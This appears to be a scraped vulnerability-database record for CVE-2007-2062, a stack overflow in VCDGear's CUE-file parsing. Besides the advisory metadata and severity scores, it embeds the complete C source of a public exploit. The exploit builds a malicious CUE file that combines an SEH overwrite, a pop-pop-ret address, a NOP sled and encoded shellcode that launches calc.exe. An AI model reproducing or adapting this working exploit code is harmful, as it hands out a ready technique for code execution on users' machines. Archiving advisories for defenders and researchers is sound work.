ID OSVDB:34968
Type osvdb
Reporter OSVDB
Modified 2007-04-13T09:04:21
Description
No description provided by the source
References:
Secunia Advisory ID:24884
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0230.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0216.html
ISS X-Force ID: 33642
Generic Exploit URL: http://milw0rm.com/exploits/3727
CVE-2007-2062
Bugtraq ID: 23475
{"bulletinFamily": "software", "viewCount": 1, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24884](https://secuniaresearch.flexerasoftware.com/advisories/24884/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0230.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0216.html\nISS X-Force ID: 33642\nGeneric Exploit URL: http://milw0rm.com/exploits/3727\n[CVE-2007-2062](https://vulners.com/cve/CVE-2007-2062)\nBugtraq ID: 23475\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:34968", "modified": "2007-04-13T09:04:21", "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2017-04-28T13:20:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2062"]}, {"type": "exploitdb", "idList": ["EDB-ID:3727"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7583"]}], "modified": "2017-04-28T13:20:31", "rev": 2}, "vulnersScore": 7.1}, "id": "OSVDB:34968", "title": "VCDGear Cue File FILE Argument Overflow", "edition": 1, "published": "2007-04-13T09:04:21", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvelist": ["CVE-2007-2062"], "lastseen": "2017-04-28T13:20:31", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:31:23", "description": "Stack-based buffer overflow in VCDGear 3.55 and 3.56 BETA allows user-assisted remote attackers to execute arbitrary code via a long FILE argument in a CUE file.", "edition": 4, "cvss3": {}, "published": "2007-04-18T03:19:00", "title": "CVE-2007-2062", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2062"], "modified": "2018-10-16T16:41:00", "cpe": ["cpe:/a:vcdgear:vcdgear:3.56_beta", "cpe:/a:vcdgear:vcdgear:3.55"], "id": "CVE-2007-2062", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2062", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vcdgear:vcdgear:3.56_beta:*:*:*:*:*:*:*", "cpe:2.3:a:vcdgear:vcdgear:3.55:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T19:09:31", "description": "VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit. CVE-2007-2062. Local exploit for windows platform", "published": "2007-04-13T00:00:00", "type": "exploitdb", "title": "VCDGear <= 3.56 Build 050213 FILE Local Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2062"], "modified": "2007-04-13T00:00:00", "id": "EDB-ID:3727", "href": "https://www.exploit-db.com/exploits/3727/", "sourceData": "/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~\nDiscovered by: InTeL\nAuther: InTeL\nAttack Vector: SEH overwrite\nType: Local\nTested on Win2k SP4 (English)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSoftware: VCDGear v3.56 build 050213\nWebsite: www.vcdgear.com\nDescription:\n\n\"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG, \ncorrect MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has \ngrown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow \ndifferent machines to process and generate output that is compatible between one another. \n\nTotal Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]\n\nGreetz: erazerz, m03, devcode, #pen15\n*/\n\n#include <stdlib.h>\n#include <stdio.h>\n\n// Exec Calc.exe Scode\nunsigned char scode[] =\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42\"\n\"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32\"\n\"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a\"\n\"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c\"\n\"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57\"\n\"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50\"\n\"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d\"\n\"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f\"\n\"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a\"\n\"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76\"\n\"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65\"\n\"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78\"\n\"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f\"\n\"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65\"\n\"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d\"\n\"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31\"\n\"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69\"\n\"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61\"\n\"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70\"\n\"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42\";\n\n\nint main(int argc, char *argv[])\n{\n\tFILE *handle;\n\n\tif(argc < 2) {\n\t\tprintf(\"0day VCDGear exploit\\n\");\n\t\tprintf(\"Usage: %s <output CUE file>\", argv[0]);\n\t\treturn 0;\n\t}\n\n\tif(!(handle = fopen(argv[1], \"w\"))) {\n\t\tprintf(\"[+] Error\");\n\t\treturn 0;\n\t}\n\n\tfputs(\"FILE \\\"\", handle);\n\tfor (int i=0;i<324;i++) \\\n\t\tfputs(\"A\", handle);\n\t\n\tfputs(\"\\xeb\\x32\\x90\\x90\", handle);\n\tfputs(\"\\x3a\\x1f\\x03\\x75\", handle); //pop edi, pop esi, retn in ws2_32.dll (English / \t5.0.2195.6601)\n\tfor (i=0;i<200;i++) \n\t\tfputs(\"\\x90\", handle);\n\n\tfputs((char *)scode, handle);\n\tfputs(\"\\\" BINARY\\n\", handle);\n\tfputs(\" TRACK 01 MODE2/2352\\n\", handle);\n\tfputs(\" INDEX 01 00:00:00\\n\", handle);\n\t\n\tfclose(handle);\n\t\n\tprintf(\"[+] File successfully created\");\n\n\treturn 0;\n}\n\n// milw0rm.com [2007-04-13]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3727/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-2062"], "description": "Buffer overflow on parsing .cue files.", "edition": 1, "modified": "2007-04-16T00:00:00", "published": "2007-04-16T00:00:00", "id": "SECURITYVULNS:VULN:7583", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7583", "title": "VCDGear buffer overflow", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}